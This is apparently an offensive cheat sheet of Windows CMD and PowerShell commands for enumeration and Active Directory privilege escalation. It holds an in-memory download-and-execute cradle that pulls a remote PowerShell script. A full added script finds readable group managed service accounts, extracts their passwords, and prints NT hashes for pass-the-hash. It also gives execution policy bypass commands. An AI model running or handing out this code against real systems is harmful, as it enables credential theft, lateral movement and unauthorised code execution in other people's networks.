CMD and Powershell

List hidden files

dir . -att h
dir -Force
ls -Hidden (-Directory/-File)

Basic enumeration

Get-LocalUser
Get-ChildItem env:
net user <user> /domain

Execute PowerShell Script in Memory

powershell -nop -c "iex (New-Object Net.WebClient).DownloadString('http://..../.ps1')"

AD Privilege Escalation

Service Accounts

Group Managed Service Accounts (gMSA): PrincipalsAllowedToRetrieveManagedPassword lists who may read the password
Get-ADServiceAccount -Identity 'srv-acc-name' -Properties *
// see PrincipalsAllowedToRetrieveManagedPassword : {CN=GROUP,OU=Sites,DC=DOMAIN,DC=DOMAIN}
// if your account, or a group you are in (nested groups count), is in {CN..} you can retrieve the password blob
$managedpass = (Get-ADServiceAccount -Identity 'srv-acc-name' -Properties 'msDS-ManagedPassword').'msDS-ManagedPassword'
// decode the msDS-ManagedPassword blob with the DSInternals module (Import-Module DSInternals)
$pass = (ConvertFrom-ADManagedPasswordBlob -Blob $managedpass).SecureCurrentPassword
// the gMSA sAMAccountName ends with $, so the credential user is DOMAIN\srv-acc-name$
$cred = New-Object System.Management.Automation.PSCredential 'DOMAIN\srv-acc-name$', $pass
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
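The steps above done end to end, as an added example that is not part of the original notes: enumerate every gMSA in the domain, check which ones the current token is allowed to read, then pull and decode msDS-ManagedPassword for those. It assumes the ActiveDirectory (RSAT) and DSInternals modules are installed and that you run it as the domain user whose access you want to test; the function names Get-ReadableGmsa and Get-GmsaPassword are my own.

```powershell
# Added example, not from the original notes. Requires RSAT ActiveDirectory
# and DSInternals (Install-Module DSInternals). Function names are mine.
Import-Module ActiveDirectory
Import-Module DSInternals

# SIDs held by the current token: our own SID plus every group, nested and
# domain groups included. This is what the DC checks against
# PrincipalsAllowedToRetrieveManagedPassword, so comparing SIDs is more
# reliable than matching group names. Run this as the domain user in question.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

function Get-ReadableGmsa {
    # Returns one object per gMSA whose allowed-principal list contains a
    # user, computer or group present in the current token.
    $gmsas = Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
             Where-Object { $_.ObjectClass -eq 'msDS-GroupManagedServiceAccount' }
    foreach ($g in $gmsas) {
        foreach ($dn in $g.PrincipalsAllowedToRetrieveManagedPassword) {
            # Each entry is a DN; resolve it to a SID for the comparison.
            $sid = (Get-ADObject -Identity $dn -Properties objectSid).objectSid.Value
            if ($mySids -contains $sid) {
                [PSCustomObject]@{ Account = $g.SamAccountName; Via = $dn }
                break
            }
        }
    }
}

function Get-GmsaPassword {
    param([Parameter(Mandatory)][string]$SamAccountName)   # e.g. 'svc-sql$'
    # msDS-ManagedPassword is only returned to an authorised caller over a
    # protected channel; the AD module talks to ADWS, which qualifies.
    $blobBytes = (Get-ADServiceAccount -Identity $SamAccountName `
                  -Properties 'msDS-ManagedPassword').'msDS-ManagedPassword'
    if (-not $blobBytes) {
        throw "No password blob returned for $SamAccountName (not authorised, or not a gMSA)"
    }
    $blob = ConvertFrom-ADManagedPasswordBlob -Blob $blobBytes
    [PSCustomObject]@{
        Account    = $SamAccountName
        # gMSA passwords are 240 bytes of random UTF-16, so the NT hash is the
        # form you will actually reuse (pass-the-hash / overpass-the-hash).
        NTHash     = ConvertTo-NTHash -Password $blob.SecureCurrentPassword
        Credential = New-Object System.Management.Automation.PSCredential `
                        -ArgumentList ("$env:USERDOMAIN\$SamAccountName", $blob.SecureCurrentPassword)
    }
}

# Usage: list what we can read, then fetch each one.
$readable = Get-ReadableGmsa
$readable | Format-Table -AutoSize
foreach ($r in $readable) {
    $p = Get-GmsaPassword -SamAccountName $r.Account
    '{0}: NT hash {1}' -f $p.Account, $p.NTHash
    # To act as the gMSA (WinRM must be enabled on the target):
    # Invoke-Command -ComputerName localhost -Credential $p.Credential -ScriptBlock { whoami }
}
```

If Get-ReadableGmsa returns nothing but you expect access, check whether the allowed principal is a computer account: the right is then held by that machine's token (SYSTEM on that host), not by your user.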

Bypass PowerShell execution policy

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
Set-ExecutionPolicy Bypass -Scope Process
// execution policy is not a security boundary: it only applies to .ps1 files, not to commands passed with -c or run through iex, and neither of these scopes needs admin rights (Process scope leaves nothing behind when the shell exits)